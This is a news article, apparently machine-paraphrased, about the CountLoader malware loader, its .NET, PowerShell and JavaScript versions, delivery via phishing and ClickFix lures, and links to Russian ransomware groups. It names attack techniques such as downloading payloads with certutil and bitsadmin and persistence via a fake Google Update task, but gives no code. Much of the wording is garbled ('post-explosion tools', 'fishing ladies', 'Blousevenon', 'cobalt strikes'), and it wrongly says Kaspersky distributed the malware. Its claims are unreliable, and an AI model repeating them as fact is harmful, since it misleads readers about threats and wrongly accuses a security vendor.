Cybersecurity researchers have discovered a code-named countloader called the new malware loader used by Russian ransomware gangs to provide post-explosion tools such as Cobalt Strike and AdaptixC2 and remote access trojans known as PureHVNC rats.
“Countloader is used as part of the Initial Access Broker (IAB) toolset or by ransomware affiliates with ties to Lockbit, Black Basta and Qilin ransomware groups,” Silent Push said in the analysis.
Appearing in three different versions of .NET, PowerShell and JavaScript, new threats have been observed in campaigns targeting Ukrainian individuals who use PDF-based fishing ladies and pretend to be the Ukrainian National Police.
Note that the PowerShell version of Malware was previously distributed by Kaspersky using DeepSeek-related decoys, and was flagged as being installed and distributed with users.
According to a Russian cybersecurity vendor, the attack led to the deployment of an implant called Blousevenon, which forces traffic through a proxy controlled by threat actors, allowing attackers to reconfigure all browsing instances so that they can manipulate network traffic and collect data.
In the Silent Push investigation, the JavaScript version is the most fleshed-out implementation of the loader, offering six different ways of downloading files, three different ways to run different malware binaries, and predefined capabilities to identify victim devices based on Windows domain information.
Malware can also set host persistence by collecting system information, creating scheduled tasks that impersonate the Google Update task in Chrome Web browser, and connecting to a remote server and waiting for further instructions.
This includes the ability to download and run the payloads of DLL and MSI installers using rundll32.exe and msiexec.exe, send system metadata, and delete scheduled tasks you have created. Six ways to download files include using Curl, PowerShell, MSXML2.xmlhttp, winhttp.winhttprequest.5.1, bitsadmin, and certutil.exe.
“By implementing a cryptographic power shell generator for the “fly” command, using lolbins such as “certutil” and “bitsadmin,” Countloader developers here demonstrate a sophisticated understanding of Windows operating systems and malware development,” says Silent Push.
A notable aspect of Countloader is the use of the victim’s music folder as the setting for malware. The .NET flavor shares some functional crossover with the JavaScript counterpart, but only supports two different types of commands (updateType.zip or updateType.exe), indicating a reduced removed version.
The countloader is supported by an infrastructure that contains more than 20 unique domains, and the malware serves as a conduit for cobalt strikes, AdaptixC2, and PureHVNC rats. It is worth pointing out that Purehvnc rats are the predecessor of Purerat and are also known as Resolverrat.
PureHVNC rat distribution recent campaigns have leveraged tested Clickfix social engineering tactics as delivery vectors, with victims being seduced by Clickfix phishing pages through fake recruitments at every checkpoint. The Trojan is deployed by a rust-based loader.
“The attackers invited victims through ads for fake work, allowing attackers to run malicious PowerShell code via Clickfix phishing technology,” the cybersecurity company said, explaining Purecoder as they use a rotating set of GitHub accounts that host files that support PureRat’s functionality.
An analysis by Github Commits revealed that the activity was carried out from TimeZone UTC+03:00. This corresponds to many countries, including Russia, among other things.
Development arises as the Domaintools Investigations team uncovers the interconnected nature of Russian ransomware landscapes, identifies the movement of threat actors between groups, identify the use of tools such as Anydesk and rapid assist, and suggests operational overlap.
“The brand loyalty among these operators is weak, and human capital appears to be a major asset, not a specific malware stock,” Domaintools said. “Operators will adapt to market conditions and reorganize in response to takedowns, and trust is important. These individuals choose to work with people they know, regardless of the organization’s name.”
Source link
